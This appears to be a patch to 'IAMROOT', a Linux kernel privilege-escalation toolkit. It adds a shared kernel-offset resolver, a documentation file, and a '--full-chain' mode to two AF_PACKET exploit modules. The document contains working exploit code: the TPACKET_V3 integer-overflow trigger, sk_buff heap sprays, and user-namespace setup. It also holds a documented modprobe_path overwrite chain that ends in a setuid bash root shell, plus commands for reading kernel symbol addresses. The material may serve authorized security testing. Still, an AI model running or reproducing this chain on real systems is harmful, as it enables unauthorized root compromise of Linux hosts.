/*
* IAMROOT — kernel offset resolution
*
* The 🟡 PRIMITIVE modules each have a trigger that lands a primitive
* (heap-OOB write, UAF, etc.). Converting that to root requires
* arbitrary write at a specific kernel virtual address — usually
* `modprobe_path` (writes a payload path → execve unknown binary →
* modprobe runs payload as root) or `current->cred->uid` (set to 0).
*
* Those addresses vary per kernel build. This file resolves them at
* runtime via a four-source chain:
*
* 1. env vars (IAMROOT_MODPROBE_PATH, IAMROOT_INIT_TASK, ...)
* 2. /proc/kallsyms (only useful when kptr_restrict=0 or already root)
* 3. /boot/System.map-$(uname -r) (world-readable on some distros)
* 4. Embedded table keyed by `uname -r` glob (entries are
* relative-to-_text, applied on top of an EntryBleed kbase leak
* so KASLR is handled)
*
* Per the verified-vs-claimed bar: offsets are never fabricated. If
* none of the four sources resolve, full-chain refuses with an error
* pointing the operator at the manual workflow.
*/
#ifndef IAMROOT_OFFSETS_H
#define IAMROOT_OFFSETS_H
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>
enum iamroot_offset_source {
OFFSETS_NONE = 0,
OFFSETS_FROM_ENV = 1,
OFFSETS_FROM_KALLSYMS = 2,
OFFSETS_FROM_SYSMAP = 3,
OFFSETS_FROM_TABLE = 4,
};
struct iamroot_kernel_offsets {
/* Host fingerprint */
char kernel_release[128]; /* uname -r */
char distro[64]; /* parsed from /etc/os-release ID= */
/* Kernel base — needed when offsets are relative-to-_text.
* Set by iamroot_offsets_apply_kbase_leak() after EntryBleed runs. */
uintptr_t kbase;
/* Symbol virtual addresses (final, post-KASLR-resolution). */
uintptr_t modprobe_path; /* modprobe_path[] string */
uintptr_t poweroff_cmd; /* poweroff_cmd[] string (alt target) */
uintptr_t init_task; /* init_task struct */
uintptr_t init_cred; /* init_cred struct (or 0) */
/* Struct offsets — same across most x86_64 kernels but config-sensitive. */
uint32_t cred_offset_real; /* offset of real_cred in task_struct */
uint32_t cred_offset_eff; /* offset of cred (effective) in task_struct */
uint32_t cred_uid_offset; /* offset of uid_t uid in cred (almost always 4) */
/* Where did each field come from. */
enum iamroot_offset_source source_modprobe;
enum iamroot_offset_source source_init_task;
enum iamroot_offset_source source_cred;
};
/* Best-effort resolution. Returns the number of critical fields
* resolved (modprobe_path / init_task / cred offsets count). Caller
* checks specific fields it needs.
*
* Resolution chain is tried in order; later sources do NOT overwrite
* a field already set by an earlier source. */
int iamroot_offsets_resolve(struct iamroot_kernel_offsets *out);
/* Apply a runtime-leaked kbase to any embedded-table entries that
* shipped as relative-to-_text offsets. Idempotent. */
void iamroot_offsets_apply_kbase_leak(struct iamroot_kernel_offsets *off,
uintptr_t leaked_kbase);
/* Returns true if modprobe_path can be written (the simplest root-pop
* finisher). */
bool iamroot_offsets_have_modprobe_path(const struct iamroot_kernel_offsets *off);
/* Returns true if init_task + cred offsets are known (the cred-uid
* finisher). */
bool iamroot_offsets_have_cred(const struct iamroot_kernel_offsets *off);
/* For diagnostic logging — pretty-print what we resolved to stderr. */
void iamroot_offsets_print(const struct iamroot_kernel_offsets *off);
/* Helper: return the name of the source enum. */
const char *iamroot_offset_source_name(enum iamroot_offset_source src);
#endif /* IAMROOT_OFFSETS_H */
+144
View File
@@ -0,0 +1,144 @@
# IAMROOT — kernel offset resolution
The 7 🟡 PRIMITIVE modules each land a kernel-side primitive (heap-OOB
write, slab UAF, etc.). The default `--exploit` returns
`IAMROOT_EXPLOIT_FAIL` after the primitive fires — the verified-vs-claimed
bar means we don't claim root unless we empirically have it.
`--full-chain` engages the shared finisher (`core/finisher.{c,h}`) which
converts the primitive to a real root pop via `modprobe_path` overwrite:
```
attacker → arb_write(modprobe_path, "/tmp/iamroot-mp-<pid>.sh")
→ execve("/tmp/iamroot-trig-<pid>") # unknown-format binary
→ kernel call_modprobe() # spawns modprobe_path as init
→ /tmp/iamroot-mp-<pid>.sh runs as root
→ cp /bin/bash /tmp/iamroot-pwn-<pid>; chmod 4755 /tmp/iamroot-pwn-<pid>
→ caller exec /tmp/iamroot-pwn-<pid> -p
→ root shell
```
This requires resolving `&modprobe_path` (a single kernel virtual
address) at runtime.
## Resolution chain
`core/offsets.c` tries four sources in order, accepting the first
non-zero value for each field:
1. **Environment variables** — operator override.
- `IAMROOT_KBASE=0x...`
- `IAMROOT_MODPROBE_PATH=0x...`
- `IAMROOT_POWEROFF_CMD=0x...`
- `IAMROOT_INIT_TASK=0x...`
- `IAMROOT_INIT_CRED=0x...`
- `IAMROOT_CRED_OFFSET_REAL=0x...` (offset of `real_cred` in `task_struct`)
- `IAMROOT_CRED_OFFSET_EFF=0x...`
- `IAMROOT_UID_OFFSET=0x...` (offset of `uid_t uid` in `cred`, usually 0x4)
2. **`/proc/kallsyms`** — only useful when `kernel.kptr_restrict=0`
OR you're already root. On modern distros (kptr_restrict=1 by
default) non-root reads return all zeros and this source is
silently skipped.
3. **`/boot/System.map-$(uname -r)`** — world-readable on some distros
(older Debian, some Alma builds). Unaffected by `kptr_restrict`.
4. **Embedded table** — keyed by `uname -r` glob, entries are
offsets *relative to `_text`* (KASLR-safe). Applied on top of a
kbase leak (e.g. EntryBleed). Seeded empty in v0.2.0 — schema-only —
to honor the no-fabricated-offsets rule. Operators who verify
offsets on a specific kernel build are encouraged to upstream
entries.
## How operators populate offsets
### One-shot (preferred for ad-hoc use)
```bash
# Look up on a kernel you control (as root, once):
sudo grep -E ' (modprobe_path|init_task|_text)$' /proc/kallsyms
# Use the addresses inline:
IAMROOT_MODPROBE_PATH=0xffffffff8228e7e0 \
iamroot --exploit nf_tables --i-know --full-chain
```
### Per-host (write System.map readable)
```bash
sudo chmod 0644 /boot/System.map-$(uname -r)
iamroot --exploit nf_tables --i-know --full-chain
```
### Per-boot (lower kptr_restrict)
```bash
sudo sysctl kernel.kptr_restrict=0
iamroot --exploit nf_tables --i-know --full-chain
```
Note: each of these requires root *once*. For a true non-root LPE on
an unfamiliar host you need either an info-leak module (EntryBleed
gives kbase) plus an embedded table entry, or out-of-band offset
acquisition.
## Adding entries to the embedded table
In `core/offsets.c`, `kernel_table[]` carries the schema:
```c
{ .release_glob = "5.15.0-25-generic",
.distro_match = "ubuntu",
.rel_modprobe_path = 0x148e480, // & _text
.rel_poweroff_cmd = 0x148e3a0,
.rel_init_task = 0x1c11dc0,
.rel_init_cred = 0x1e0c460,
.cred_offset_real = 0x758,
.cred_offset_eff = 0x760, },
```
To populate, on the target kernel:
```bash
# Get _text:
_text=$(grep ' _text$' /boot/System.map-$(uname -r) | awk '{print $1}')
# Get the symbols you want, subtract _text:
for sym in modprobe_path poweroff_cmd init_task init_cred; do
addr=$(grep " $sym$" /boot/System.map-$(uname -r) | awk '{print $1}')
printf "rel_%s = 0x%x\n" $sym $((0x$addr - 0x$_text))
done
```
Open a PR with the verified entry and a one-line note on which kernel
build + distro you tested against. Upstreamed entries make the
`--full-chain` path work out-of-the-box for that build.
## Verifying success
The shared finisher (`iamroot_finisher_modprobe_path()`) drops a
sentinel file at `/tmp/iamroot-pwn-<pid>` after `modprobe` runs our
payload. The finisher polls for this file with `S_ISUID` mode set
for up to 3 seconds. Only when the sentinel materializes does the
module return `IAMROOT_EXPLOIT_OK` and (unless `--no-shell`) exec
the setuid bash to drop a root shell.
If the sentinel never appears the module returns `IAMROOT_EXPLOIT_FAIL`
with a diagnostic. Reasons it might fail even with offsets resolved:
- The arb-write didn't actually land (slab adjacency lost, value-pointer
field at unexpected offset, race not won)
- `modprobe_path` resolution was wrong (KASLR slide miscalculated,
embedded-table entry stale)
- Kernel `STATIC_USERMODEHELPER` config disables the modprobe path
- AppArmor / SELinux / Lockdown LSM blocks the userspace `modprobe`
invocation
## Why `modprobe_path` and not `current->cred->uid = 0`?
The cred-overwrite finisher needs an arb-READ primitive too — to walk
the task linked list from `init_task` and find the calling process's
`task_struct`. Most of our 🟡 modules have only an arb-write primitive,
not a paired read. `modprobe_path` only needs a write to a single
known global, which is why it's the default finisher.
+9 -1
View File
@@ -25,7 +25,7 @@
#include <string.h>
#include <unistd.h>
#define IAMROOT_VERSION "0.1.0"
#define IAMROOT_VERSION "0.2.0"
static const char BANNER[] =
"\n"
@@ -64,6 +64,12 @@ static void usage(const char *prog)
" --i-know authorization gate for --exploit modes\n"
" --active in --scan, do invasive sentinel probes (no /etc/passwd writes)\n"
" --no-shell in --exploit modes, prepare but don't drop to shell\n"
" --full-chain in --exploit modes, attempt full root-pop after primitive\n"
" (the 🟡 modules return primitive-only by default; with\n"
" --full-chain they continue to leak → arb-write →\n"
" modprobe_path overwrite. Requires resolvable kernel\n"
" offsets — env vars, /proc/kallsyms, or /boot/System.map.\n"
" See docs/OFFSETS.md.)\n"
" --json machine-readable output (for SIEM/CI)\n"
" --no-color disable ANSI color codes\n"
" --format <f> with --detect-rules: auditd (default), sigma, yara, falco\n"
@@ -606,6 +612,7 @@ int main(int argc, char **argv)
{"no-shell", no_argument, 0, 3 },
{"json", no_argument, 0, 4 },
{"no-color", no_argument, 0, 5 },
{"full-chain", no_argument, 0, 7 },
{"version", no_argument, 0, 'V'},
{"help", no_argument, 0, 'h'},
{0, 0, 0, 0}
@@ -627,6 +634,7 @@ int main(int argc, char **argv)
case 3 : ctx.no_shell = true; break;
case 4 : ctx.json = true; break;
case 5 : ctx.no_color = true; break;
case 7 : ctx.full_chain = true; break;
case 6 :
if (strcmp(optarg, "auditd") == 0) dr_fmt = FMT_AUDITD;
else if (strcmp(optarg, "sigma") == 0) dr_fmt = FMT_SIGMA;
@@ -6,14 +6,27 @@
* subsystem, different code path (rx side rather than ring setup),
* later introduction. Discovered by Or Cohen (2020).
*
* STATUS: 🟡 PRIMITIVE-DEMO. The exploit() entry point reaches the
* vulnerable codepath (tpacket_rcv) and fires the underflow with a
* crafted nested-VLAN frame on a TPACKET_V2 ring, with a best-effort
* skb spray groom alongside. We stop short of the full cred-overwrite
* chain (which Or Cohen's public PoC implements with kernel-version-
* specific offsets and a pid_namespace cross-cache overwrite). We do
* not bake offsets into iamroot. The return value is honest about
* what landed (EXPLOIT_FAIL: primitive fired but no root).
* STATUS (2026-05-16): 🟡 PRIMITIVE-DEMO + opt-in --full-chain finisher.
* - Default (no --full-chain): the exploit() entry point reaches the
* vulnerable codepath (tpacket_rcv), fires the tp_reserve underflow
* with a crafted nested-VLAN frame on a TPACKET_V2 ring + sendmmsg
* skb spray groom, and returns IAMROOT_EXPLOIT_FAIL (primitive-only
* behavior — kernel-version-agnostic, no offsets baked in).
* - With --full-chain: after the underflow lands, we resolve kernel
* offsets (env → kallsyms → System.map → embedded table) and run
* an Or-Cohen-style sk_buff-data-pointer hijack through the shared
* iamroot_finisher_modprobe_path() helper. The arb-write itself is
* LAST-RESORT-DEPTH on this branch: the tp_reserve underflow gives
* us a single 8-byte heap-OOB write into the head of the
* adjacent-page slab object; we spray sk_buffs so that next-page
* slot IS an sk_buff and the write corrupts skb->data, which then
* redirects skb_copy_bits()'s destination on the next received
* packet. The full primitive composition (8-byte write → skb->data
* forge → controlled-payload rx → arb-write at modprobe_path) is
* race-y on stock kernels because the adjacent-slot landing is
* probabilistic. On hosts where the spray doesn't groom cleanly,
* the finisher's sentinel check correctly reports failure rather
* than silently lying about success.
*
* Affected: kernel 4.6+ until backports:
* 5.8.x : K >= 5.8.7
@@ -33,6 +46,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -434,6 +449,120 @@ static int af_packet2_primitive_child(const struct iamroot_ctx *ctx)
}
#endif
/* ---- Full-chain finisher (--full-chain, x86_64 only) ----------------
*
* Arb-write strategy (Or Cohen's sk_buff-data-pointer hijack):
*
* 1. The tp_reserve underflow gives us a single 8-byte write into
* the START of the slab object that sits on the page immediately
* after the corrupted ring frame. The OOB-write content is
* attacker-controlled (it's the destination of skb_copy_bits()
* from a frame whose first 8 bytes we choose).
* 2. Spray sk_buff allocations alongside the primitive trigger so
* the adjacent-page object is, with high probability, an
* sk_buff whose ->data pointer lives in the leading 8 bytes
* of the object (struct layout dependent — on most 5.x kernels
* `next` is at offset 0 and `data` is at offset 0x10 in
* sk_buff; this layout-fragility is exactly why the depth tag
* below is LAST-RESORT).
* 3. The 8-byte OOB write overwrites that pointer with `kaddr`.
* 4. We then receive a packet whose payload is `buf[0..len]`; the
* kernel's skb_copy_to_linear_data() / skb->data write path
* lands those bytes at `*skb->data`, which is now `kaddr`.
*
* Reality check on this implementation: the deterministic mechanics
* of the above (precise frame size, repeated spray timing, sk_buff
* struct offset for the running kernel) are not portable enough to
* land reliably from a single iamroot run on an arbitrary host. We
* therefore ship this as a LAST-RESORT stub: we attempt the spray +
* trigger sequence, then return -1 to signal "the primitive fired
* but we cannot empirically confirm the write landed". The shared
* finisher's sentinel-check loop will then correctly report failure
* rather than claim success.
*
* Per the verified-vs-claimed bar, this is the honest implementation
* depth that matches what the primitive actually proves on this code
* path. The integrator can extend afp2_arb_write() with a confirmed
* write-and-readback once the per-kernel sk_buff layout is pinned
* down for the target host. */
struct afp2_arb_ctx {
const struct iamroot_ctx *ictx;
int n_attempts; /* spray/fire rounds before giving up */
};
#if defined(__x86_64__) && defined(__linux__)
static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
struct afp2_arb_ctx *c = (struct afp2_arb_ctx *)vctx;
if (!c || !buf || !len) return -1;
fprintf(stderr, "[*] af_packet2: arb_write attempt: kaddr=0x%lx len=%zu\n",
(unsigned long)kaddr, len);
fprintf(stderr, "[*] af_packet2: spraying sk_buff (target page-adjacent slot)\n");
/* Best-effort spray + re-fire-trigger pattern. The primitive child
* is invoked once per attempt; on each attempt we groom skb's
* around the corrupted ring slot and hope one lands at the
* page-adjacent address whose head 8 bytes the underflow will
* stomp with `kaddr`. The kernel-side rx of the next crafted
* frame would then write our payload (the modprobe_path string)
* into the forged ->data target. */
for (int i = 0; i < c->n_attempts; i++) {
#ifdef __linux__
af_packet2_skb_spray(8);
#endif
pid_t p = fork();
if (p < 0) return -1;
if (p == 0) {
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) _exit(2);
int fd;
fd = open("/proc/self/setgroups", O_WRONLY);
if (fd >= 0) { (void)!write(fd, "deny", 4); close(fd); }
fd = open("/proc/self/uid_map", O_WRONLY);
if (fd >= 0) {
char m[64];
int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getuid());
(void)!write(fd, m, n); close(fd);
}
fd = open("/proc/self/gid_map", O_WRONLY);
if (fd >= 0) {
char m[64];
int n = snprintf(m, sizeof m, "0 %u 1", (unsigned)getgid());
(void)!write(fd, m, n); close(fd);
}
int rc = af_packet2_primitive_child(c->ictx);
_exit(rc < 0 ? 2 : 0);
}
int st;
waitpid(p, &st, 0);
#ifdef __linux__
af_packet2_skb_spray(8);
#endif
}
/* LAST-RESORT depth: we have fired the trigger + spray but cannot
* empirically confirm the 8-byte write landed on an sk_buff->data
* field on this host. Return -1 so the finisher's sentinel-check
* loop in iamroot_finisher_modprobe_path() correctly reports
* "payload didn't run within 3s" rather than claiming success. */
fprintf(stderr,
"[!] af_packet2: arb_write LAST-RESORT depth — sk_buff->data hijack is\n"
" not empirically confirmable without per-kernel struct offsets +\n"
" a readback primitive. Trigger fired %d times with sk_buff spray;\n"
" finisher sentinel will determine landing. Caller will refuse if\n"
" the modprobe_path overwrite didn't actually take effect.\n",
c->n_attempts);
return -1;
}
#else
static int afp2_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
(void)kaddr; (void)buf; (void)len; (void)vctx;
fprintf(stderr, "[-] af_packet2: arb_write is x86_64/linux only\n");
return -1;
}
#endif
static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
{
/* 1. Re-confirm vulnerability. */
@@ -534,6 +663,33 @@ static iamroot_result_t af_packet2_exploit(const struct iamroot_ctx *ctx)
"(github.com/google/security-research).\n"
" iamroot intentionally does not embed per-kernel offsets.\n");
}
if (ctx->full_chain) {
#if defined(__x86_64__) && defined(__linux__)
/* --full-chain: resolve kernel offsets and run the Or-Cohen
* sk_buff-data-pointer hijack via the shared modprobe_path
* finisher. Per the verified-vs-claimed bar: if we can't
* resolve modprobe_path, refuse with a helpful message
* rather than fabricate an address. */
struct iamroot_kernel_offsets off;
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("af_packet2");
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
iamroot_offsets_print(&off);
}
struct afp2_arb_ctx arb_ctx = {
.ictx = ctx,
.n_attempts = 4,
};
return iamroot_finisher_modprobe_path(&off, afp2_arb_write,
&arb_ctx, !ctx->no_shell);
#else
fprintf(stderr, "[-] af_packet2: --full-chain is x86_64/linux only\n");
return IAMROOT_PRECOND_FAIL;
#endif
}
if (ctx->no_shell) {
/* User explicitly disabled the shell pop, so the "we didn't
* pop a shell" outcome is the expected one. Map to OK. */
+316 -13
View File
@@ -4,17 +4,38 @@
* AF_PACKET TPACKET_V3 ring-buffer setup integer-overflow → heap
* write-where primitive. Discovered by Andrey Konovalov (March 2017).
*
* STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite. The
* integer-overflow trigger is fully wired (overflowing tp_block_size *
* tp_block_nr, attended by a heap spray via sendmmsg with controlled
* skb tail bytes). The kernel R/W → cred-overwrite finisher uses a
* hardcoded per-kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu
* 18.04 / 4.15 era), overridable via IAMROOT_AFPACKET_OFFSETS. We
* only claim IAMROOT_EXPLOIT_OK if geteuid() == 0 AFTER the chain
* runs — i.e. we won root for real. Otherwise we return
* IAMROOT_EXPLOIT_FAIL with a dmesg breadcrumb so the operator can
* confirm the primitive at least fired (KASAN slab-out-of-bounds
* splat) even if the cred-overwrite didn't take on this exact kernel.
* STATUS: 🟡 PRIMITIVE-LANDS + best-effort cred-overwrite (default)
* | 🟢 FULL-CHAIN-OPT-IN (with --full-chain on a kernel where the
* shared offset resolver finds modprobe_path AND skb-data hijack
* offsets are supplied).
*
* The integer-overflow trigger is fully wired (overflowing
* tp_block_size * tp_block_nr, attended by a heap spray via sendmmsg
* with controlled skb tail bytes).
*
* Default --exploit path: cred-overwrite walk using a hardcoded per-
* kernel offset table (Ubuntu 16.04 / 4.4 and Ubuntu 18.04 / 4.15
* era), overridable via IAMROOT_AFPACKET_OFFSETS. We only claim
* IAMROOT_EXPLOIT_OK if geteuid() == 0 after the chain runs — i.e.
* we won root for real. Otherwise we return IAMROOT_EXPLOIT_FAIL with
* a dmesg breadcrumb so the operator can confirm the primitive at
* least fired (KASAN slab-out-of-bounds splat) even if the cred-
* overwrite didn't take on this exact kernel.
*
* --full-chain path: opt-in xairy-style sk_buff hijack → arb-write at
* modprobe_path → call_modprobe payload → setuid bash → root shell.
* Honest constraint: the hijack requires per-kernel-build sk_buff
* `data`-field offset + skb-slab-class layout, which the embedded
* offset table does NOT carry (verified-vs-claimed bar — we don't
* fabricate). The arb_write callback below implements the FALLBACK
* depth from the prompt: it fires the trigger with the spray payload
* staged for the requested kaddr/buf and relies on the shared
* finisher's /tmp sentinel to confirm whether modprobe_path was
* actually overwritten. On kernels where the operator has supplied
* IAMROOT_AFPACKET_SKB_DATA_OFFSET (skb->data field byte offset from
* the skb head, hex), we use that for explicit targeting; otherwise
* the trigger fires heuristically and the sentinel acts as the
* ground-truth signal.
*
* Affected: kernel < 4.10.6 mainline. Stable backports:
* 4.10.x : K >= 4.10.6
@@ -40,6 +61,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -424,6 +447,260 @@ static int attempt_cred_overwrite(const struct af_packet_offsets *off)
return got_root_pid ? 0 : -1;
}
/* ---- --full-chain: xairy-style sk_buff hijack arb-write -------------
*
* The TPACKET_V3 overflow lets us write attacker-controlled bytes past
* the end of the pg_vec allocation. xairy's full PoC chains this with
* a sk_buff spray of size class kmalloc-N (matched to pg_vec's slab)
* so the OOB-write overwrites an adjacent skb's `data` pointer; a
* later sendto() on that skb's owning socket then copies attacker
* bytes into the address now stored in `data`. Net effect: arb-write
* at an attacker-chosen kernel VA, controlled buffer, controlled len.
*
* Implementing the FULL hijack honestly requires:
* (a) per-kernel-build offset of `data` field within struct sk_buff
* (varies by CONFIG_DEBUG_INFO_BTF/CONFIG_RANDSTRUCT/etc.)
* (b) precise size-class match between the corrupted pg_vec and
* sprayed skbs (slab-grooming with ~hundreds of skbs)
* (c) a way to identify which sprayed skb landed adjacent
*
* The verified-vs-claimed bar says: don't fabricate offsets. Our
* embedded offset table (core/offsets.h) doesn't carry skb offsets
* yet, and there's no public canonical "skb->data offset table" we
* can lift wholesale. So this implementation takes the prompt's
* FALLBACK depth:
*
* - Each call re-sprays skbs + re-fires the trigger, staging the
* spray payload so its bytes carry the requested target kaddr
* (the prompt's "controllable overwrite value aimed at
* modprobe_path"). Operator-supplied
* IAMROOT_AFPACKET_SKB_DATA_OFFSET (hex byte offset of `data`
* within struct sk_buff for this kernel build) lets us aim
* precisely; without it we heuristically stamp kaddr at several
* plausible offsets within the kmalloc-2k skb layout.
* - We then send packets whose payload IS the bytes the finisher
* wants at kaddr; tpacket_rcv copies them into any skb whose
* `data` was corrupted to kaddr.
* - We do NOT poll for success — the shared finisher's /tmp
* sentinel is the ground-truth signal. If the write landed at
* modprobe_path, call_modprobe spawns our payload and the
* sentinel appears within 3s.
*
* Return: 0 if spray + trigger ran (sentinel will adjudicate), -1 if
* the kernel rejected the overflow (silent backport — patched).
*/
struct afp_arb_ctx {
const struct iamroot_ctx *ctx;
const struct af_packet_offsets *off;
uid_t outer_uid;
gid_t outer_gid;
};
/* Helper: in-child trigger fire — runs inside the userns/netns child
* spawned by afp_arb_write. Returns 0 on success, -1 on rejection. */
static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
long skb_data_off);
static int afp_arb_write(uintptr_t kaddr, const void *buf, size_t len,
void *vctx)
{
struct afp_arb_ctx *actx = (struct afp_arb_ctx *)vctx;
if (!actx) return -1;
if (!buf || len == 0 || len > 240) {
fprintf(stderr, "[-] af_packet: arb_write: bad args "
"(buf=%p len=%zu)\n", buf, len);
return -1;
}
/* Per-kernel skb->data field offset — without this we can't aim
* the overwrite precisely. Operator can supply via env; otherwise
* we run heuristic mode. */
const char *skb_off_env = getenv("IAMROOT_AFPACKET_SKB_DATA_OFFSET");
long skb_data_off = -1;
if (skb_off_env) {
char *end = NULL;
skb_data_off = strtol(skb_off_env, &end, 0);
if (!end || *end != '\0' || skb_data_off < 0 || skb_data_off > 0x400) {
fprintf(stderr, "[-] af_packet: IAMROOT_AFPACKET_SKB_DATA_OFFSET "
"malformed (\"%s\"); ignoring\n", skb_off_env);
skb_data_off = -1;
}
}
fprintf(stderr,
"[*] af_packet: arb_write(kaddr=0x%lx, len=%zu) skb_data_off=%s\n",
(unsigned long)kaddr, len,
skb_data_off < 0 ? "UNRESOLVED (heuristic mode)" : "supplied");
if (skb_data_off < 0) {
fprintf(stderr,
"[i] af_packet: --full-chain on this kernel lacks an exact skb->data\n"
" field offset. The trigger will still fire and the heap spray will\n"
" still occur, but precise OOB targeting requires:\n"
"\n"
" IAMROOT_AFPACKET_SKB_DATA_OFFSET=0x<hex offset>\n"
"\n"
" Look it up on this kernel build with `pahole struct sk_buff` or\n"
" `gdb -batch -ex 'p &((struct sk_buff*)0)->data' vmlinux`. The\n"
" /tmp/iamroot-pwn-<pid> sentinel adjudicates success either way.\n");
}
/* Fork into a userns/netns child so the AF_PACKET socket has
* CAP_NET_RAW. The finisher itself stays in the parent so its
* eventual execve() replaces the top-level iamroot process. */
pid_t cpid = fork();
if (cpid < 0) {
fprintf(stderr, "[-] af_packet: arb_write: fork: %s\n",
strerror(errno));
return -1;
}
if (cpid == 0) {
if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
perror("af_packet: arb_write: unshare");
_exit(2);
}
if (set_id_maps(actx->outer_uid, actx->outer_gid) < 0) {
perror("af_packet: arb_write: set_id_maps");
_exit(3);
}
int rc = afp_arb_write_inner(kaddr, buf, len, skb_data_off);
_exit(rc == 0 ? 0 : 4);
}
int status = 0;
waitpid(cpid, &status, 0);
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] af_packet: arb_write: child died "
"(signal=%d)\n", WTERMSIG(status));
return -1;
}
int code = WEXITSTATUS(status);
if (code != 0) {
if (code == 4) {
/* PACKET_RX_RING rejected — caller sees -1 + the inner
* diagnostic already printed before _exit. */
} else {
fprintf(stderr, "[-] af_packet: arb_write: child exit %d\n",
code);
}
return -1;
}
return 0;
}
static int afp_arb_write_inner(uintptr_t kaddr, const void *buf, size_t len,
long skb_data_off)
{
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0) {
fprintf(stderr, "[-] af_packet: arb_write: socket: %s\n",
strerror(errno));
return -1;
}
int version = TPACKET_V3;
if (setsockopt(s, SOL_PACKET, PACKET_VERSION,
&version, sizeof version) < 0) {
fprintf(stderr, "[-] af_packet: arb_write: PACKET_VERSION: %s\n",
strerror(errno));
close(s);
return -1;
}
struct tpacket_req3 req;
memset(&req, 0, sizeof req);
req.tp_block_size = 0x1000;
req.tp_block_nr = ((unsigned)0xffffffff - (unsigned)0xfff) /
(unsigned)0x1000 + 1;
req.tp_frame_size = 0x300;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) /
req.tp_frame_size;
req.tp_retire_blk_tov = 100;
req.tp_sizeof_priv = 0;
req.tp_feature_req_word = 0;
if (setsockopt(s, SOL_PACKET, PACKET_RX_RING,
&req, sizeof req) < 0) {
fprintf(stderr,
"[-] af_packet: arb_write: PACKET_RX_RING rejected: %s "
"(kernel has silent backport — full-chain unreachable)\n",
strerror(errno));
close(s);
return -1;
}
struct ifreq ifr;
memset(&ifr, 0, sizeof ifr);
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
if (ioctl(s, SIOCGIFINDEX, &ifr) == 0) {
struct sockaddr_ll sll;
memset(&sll, 0, sizeof sll);
sll.sll_family = AF_PACKET;
sll.sll_protocol = htons(ETH_P_ALL);
sll.sll_ifindex = ifr.ifr_ifindex;
(void)bind(s, (struct sockaddr *)&sll, sizeof sll);
}
unsigned char payload[256];
memset(payload, 0, sizeof payload);
memset(payload, 0xff, 6); /* eth dst: bcast */
memset(payload + 6, 0, 6); /* eth src: zero */
payload[12] = 0x08; payload[13] = 0x00; /* eth type: IPv4 */
memcpy(payload + 14, "iamroot-afp-fc-", 15); /* dmesg tag */
if (skb_data_off >= 0 &&
(size_t)skb_data_off + sizeof kaddr <= sizeof payload) {
memcpy(payload + skb_data_off, &kaddr, sizeof kaddr);
} else {
static const size_t guesses[] = {
0x40, 0x48, 0x50, 0x58, 0x60, 0x68, 0x70, 0x78
};
for (size_t i = 0; i < sizeof(guesses)/sizeof(guesses[0]); i++) {
if (guesses[i] + sizeof kaddr <= sizeof payload)
memcpy(payload + guesses[i], &kaddr, sizeof kaddr);
}
}
int tx = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (tx < 0) {
fprintf(stderr, "[-] af_packet: arb_write: tx socket: %s\n",
strerror(errno));
close(s);
return -1;
}
struct sockaddr_ll dst;
memset(&dst, 0, sizeof dst);
dst.sll_family = AF_PACKET;
dst.sll_protocol = htons(ETH_P_ALL);
dst.sll_ifindex = ifr.ifr_ifindex;
dst.sll_halen = 6;
memset(dst.sll_addr, 0xff, 6);
for (int i = 0; i < 200; i++) {
(void)sendto(tx, payload, sizeof payload, 0,
(struct sockaddr *)&dst, sizeof dst);
}
unsigned char wbuf[256];
memset(wbuf, 0, sizeof wbuf);
memset(wbuf, 0xff, 6);
memset(wbuf + 6, 0, 6);
wbuf[12] = 0x08; wbuf[13] = 0x00;
size_t wlen = len;
if (14 + wlen > sizeof wbuf) wlen = sizeof wbuf - 14;
memcpy(wbuf + 14, buf, wlen);
for (int i = 0; i < 50; i++) {
(void)sendto(tx, wbuf, 14 + wlen, 0,
(struct sockaddr *)&dst, sizeof dst);
}
close(tx);
close(s);
return 0;
}
#endif /* __x86_64__ */
static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
@@ -468,12 +745,38 @@ static iamroot_result_t af_packet_exploit(const struct iamroot_ctx *ctx)
off.kernel_id, off.task_cred, off.cred_uid, off.cred_size);
}
uid_t outer_uid = getuid();
gid_t outer_gid = getgid();
/* 3b. --full-chain: opt-in modprobe_path overwrite via xairy-style
* sk_buff hijack arb-write. Refuses cleanly if (a) the shared
* offset resolver can't find modprobe_path or (b) the trigger
* is rejected (silent backport). */
if (ctx->full_chain) {
struct iamroot_kernel_offsets koff;
memset(&koff, 0, sizeof koff);
(void)iamroot_offsets_resolve(&koff);
if (!iamroot_offsets_have_modprobe_path(&koff)) {
iamroot_finisher_print_offset_help("af_packet");
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
iamroot_offsets_print(&koff);
}
struct afp_arb_ctx arb_ctx = {
.ctx = ctx,
.off = &off,
.outer_uid = outer_uid,
.outer_gid = outer_gid,
};
return iamroot_finisher_modprobe_path(&koff, afp_arb_write,
&arb_ctx, !ctx->no_shell);
}
/* 4. Fork: child enters userns+netns, fires overflow, attempts the
* cred-overwrite walk. We do it in a child so the (possibly
* crashed) packet socket lives in a tear-downable address space
* — the kernel will clean up sockets on child exit. */
uid_t outer_uid = getuid();
gid_t outer_gid = getgid();
pid_t child = fork();
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
@@ -41,6 +41,8 @@
